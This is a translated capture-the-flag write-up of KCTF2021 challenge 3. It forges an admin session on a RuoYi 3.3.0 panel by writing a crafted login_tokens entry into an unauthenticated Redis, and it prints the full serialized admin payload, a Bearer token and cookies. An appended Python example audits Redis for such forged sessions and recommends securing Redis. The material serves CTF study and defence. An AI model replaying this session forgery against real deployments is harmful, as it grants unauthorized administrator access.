[Original] KCTF2021 Challenge 3 统一门派 writeup
2021-5-13 19:32 4953


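The site took a long time to open. It looked familiar: RuoYi (若依).


First, download the source code from the official site and try the paths that can be accessed anonymously.

This confirms the RuoYi version: 3.3.0


Port scan:

6379 redis, no password


Code audit shows that the authentication logic depends on redis, so session information can be forged by adding a redis key/value.


Set up a local environment and generate a usable redis key/value.


Connect to KctfRedis and add the key/value: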

login_tokens:1794d721-4eb1-4a7e-af46-da6261bf1301

{"@type":"com.ruoyi.common.core.domain.model.LoginUser","accountNonExpired":true,"accountNonLocked":true,"browser":"Chrome 9","credentialsNonExpired":true,"enabled":true,"expireTime":1620905711016,"ipaddr":"127.0.0.1","loginLocation":"内网IP","loginTime":1620903911016,"os":"Windows 10","password":"$2a$10$7JB720yubVSZvUI0rEqK/.VqGOZTH.ulu33dHOiBE8ByOhJIrdAu2","permissions":Set["*:*:*"],"token":"1794d721-4eb1-4a7e-af46-da6261bf1301","user":{"admin":true,"avatar":"","createBy":"admin","createTime":1620902433000,"delFlag":"0","dept":{"children":[],"deptId":103,"deptName":"研发部门","leader":"若依","orderNum":"1","params":{"@type":"java.util.HashMap"},"parentId":101,"status":"0"},"deptId":103,"email":"ry@163.com","loginDate":1620902433000,"loginIp":"127.0.0.1","nickName":"若依","params":{"@type":"java.util.HashMap"},"password":"$2a$10$7JB720yubVSZvUI0rEqK/.VqGOZTH.ulu33dHOiBE8ByOhJIrdAu2","phonenumber":"15888888888","remark":"管理员","roles":[{"admin":true,"dataScope":"1","deptCheckStrictly":false,"flag":false,"menuCheckStrictly":false,"params":{"@type":"java.util.HashMap"},"roleId":1,"roleKey":"admin","roleName":"超级管理员","roleSort":"1","status":"0"}],"sex":"1","status":"0","userId":1,"userName":"admin"},"username":"admin"}


Open the login page in a browser.


Add this header to the request:

Authorization: Bearer eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6IjE3OTRkNzIxLTRlYjEtNGE3ZS1hZjQ2LWRhNjI2MWJmMTMwMSJ9.cpGOHk67ZpPqx6UrTEV6aJUPyxfWVe9NxeR9owsC1jffoZ9E3Sx_H1tGSy81HENOfaCe4NXoXaOxnKrJ55AmmA


Cookie:

_user_behavior_=1794d721-4eb1-4a7e-af46-da6261bf1301; Admin-Token=1794d721-4eb1-4a7e-af46-da6261bf1301




Refresh the page, and the admin page opens successfully.




Last edited by Wblank on 2021-5-14 10:14, reason:
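
An added example, not part of the original post: the JWT above carries only a login_user_key that the server resolves to a login_tokens: entry in Redis, so a defender can audit those entries for records the application is unlikely to have written. The function names and checks are assumptions for illustration (in particular that the application always stores sessions with an expiry); the JWT header and payload are taken from the post, the signature is a placeholder, and the session value is a trimmed, constructed sample.

```python
import base64
import json
import re

PREFIX = "login_tokens:"  # Redis key prefix shown in the post

def jwt_claims(token):
    """Decode a JWT payload for inspection only; the signature is NOT verified."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)  # restore stripped base64url padding
    return json.loads(base64.urlsafe_b64decode(payload))

def parse_session(raw):
    """The stored value writes sets as Set[...], which is not JSON; normalise it."""
    return json.loads(re.sub(r'(":\s*)Set\[', r"\1[", raw))

def audit(key, raw, ttl, now_ms):
    """Findings for one session key; ttl is the Redis TTL reply (-1 = no expiry).
    Findings are review indicators, not proof (an admin may hold *:*:* legitimately)."""
    rec, findings = parse_session(raw), []
    if ttl == -1:
        findings.append("no-expiry")          # assumption: the app always sets one
    if rec.get("expireTime", 0) < now_ms:
        findings.append("past-expireTime")    # record outlived its own deadline
    if key != PREFIX + str(rec.get("token")):
        findings.append("key-token-mismatch")
    if "*:*:*" in rec.get("permissions", []):
        findings.append("wildcard-permission")
    return findings

# Header and payload copied from the post; signature replaced by a placeholder.
JWT = ("eyJhbGciOiJIUzUxMiJ9."
       "eyJsb2dpbl91c2VyX2tleSI6IjE3OTRkNzIxLTRlYjEtNGE3ZS1hZjQ2LWRhNjI2MWJmMTMwMSJ9."
       "SIGNATURE")
# Constructed sample: a trimmed copy of the session value shown in the post.
SAMPLE = ('{"@type":"com.ruoyi.common.core.domain.model.LoginUser",'
          '"expireTime":1620905711016,"loginTime":1620903911016,'
          '"permissions":Set["*:*:*"],'
          '"token":"1794d721-4eb1-4a7e-af46-da6261bf1301","username":"admin"}')

if __name__ == "__main__":
    key = PREFIX + jwt_claims(JWT)["login_user_key"]
    print(key)
    print(audit(key, SAMPLE, ttl=-1, now_ms=1620990000000))
```

The underlying fix is on the Redis side: require authentication and keep port 6379 off untrusted networks, since anyone who can write these keys controls identity in the application.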